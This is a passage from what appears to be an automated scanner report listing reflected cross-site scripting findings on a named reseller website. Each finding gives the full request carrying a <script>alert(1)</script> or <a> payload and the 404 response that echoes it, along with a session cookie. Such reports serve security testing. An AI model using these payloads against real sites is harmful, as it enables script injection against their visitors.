HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/5.gif?63849<script>alert(1)</script>aee6cc06267=1 was not found on this server.</p>
...[SNIP]...

2.5457. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f094<script>alert(1)</script>8de005d4e1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service7f094<script>alert(1)</script>8de005d4e1f/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service7f094<script>alert(1)</script>8de005d4e1f/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5458. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cbae9<script>alert(1)</script>ca467735dd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themescbae9<script>alert(1)</script>ca467735dd8/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themescbae9<script>alert(1)</script>ca467735dd8/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5459. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27639<script>alert(1)</script>9dd4f12d004 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos27639<script>alert(1)</script>9dd4f12d004/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos27639<script>alert(1)</script>9dd4f12d004/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5460. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b397<script>alert(1)</script>41beb6efb2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images5b397<script>alert(1)</script>41beb6efb2/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images5b397<script>alert(1)</script>41beb6efb2/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5461. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 51e7b<script>alert(1)</script>41b67267523 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review51e7b<script>alert(1)</script>41b67267523/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review51e7b<script>alert(1)</script>41b67267523/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5462. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6b352<script>alert(1)</script>13480921d89 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/search.php6b352<script>alert(1)</script>13480921d89?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php6b352<script>alert(1)</script>13480921d89?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5463. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 15407<a>bfc3795945e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search15407<a>bfc3795945e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search15407<a>bfc3795945e&opt=2 was not found on this server.</p>
...[SNIP]...

2.5464. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9d819<a>444f31d1e37 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...9d819<a>444f31d1e37&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...9d819<a>444f31d1e37&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5465. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67871<script>alert(1)</script>96333653168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67871<script>alert(1)</script>96333653168=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67871<script>alert(1)</script>96333653168=1 was not found on this server.</p>
...[SNIP]...

2.5466. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c2b7c<a>fe97aadab31 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c2b7c<a>fe97aadab31 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c2b7c<a>fe97aadab31 was not found on this server.</p>
...[SNIP]...

2.5467. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fb95<script>alert(1)</script>657e7cfb9bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service8fb95<script>alert(1)</script>657e7cfb9bc/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8fb95<script>alert(1)</script>657e7cfb9bc/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5468. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 975ea<script>alert(1)</script>6e368c1610e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes975ea<script>alert(1)</script>6e368c1610e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes975ea<script>alert(1)</script>6e368c1610e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5469. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac6c0<script>alert(1)</script>018b1592d66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosac6c0<script>alert(1)</script>018b1592d66/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosac6c0<script>alert(1)</script>018b1592d66/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5470. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b4cc<script>alert(1)</script>af8f9a1f199 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images3b4cc<script>alert(1)</script>af8f9a1f199/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images3b4cc<script>alert(1)</script>af8f9a1f199/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5471. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cffc6<script>alert(1)</script>74b8c8a946a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/search.phpcffc6<script>alert(1)</script>74b8c8a946a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.phpcffc6<script>alert(1)</script>74b8c8a946a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5472. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e48e8<a>266597e451e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche48e8<a>266597e451e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche48e8<a>266597e451e&opt=2 was not found on this server.</p>
...[SNIP]...

2.5473. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e5650<a>62dd299e4fd was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...e5650<a>62dd299e4fd&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...e5650<a>62dd299e4fd&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5474. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6f6b<script>alert(1)</script>9ebc6e1f7eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6f6b<script>alert(1)</script>9ebc6e1f7eb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
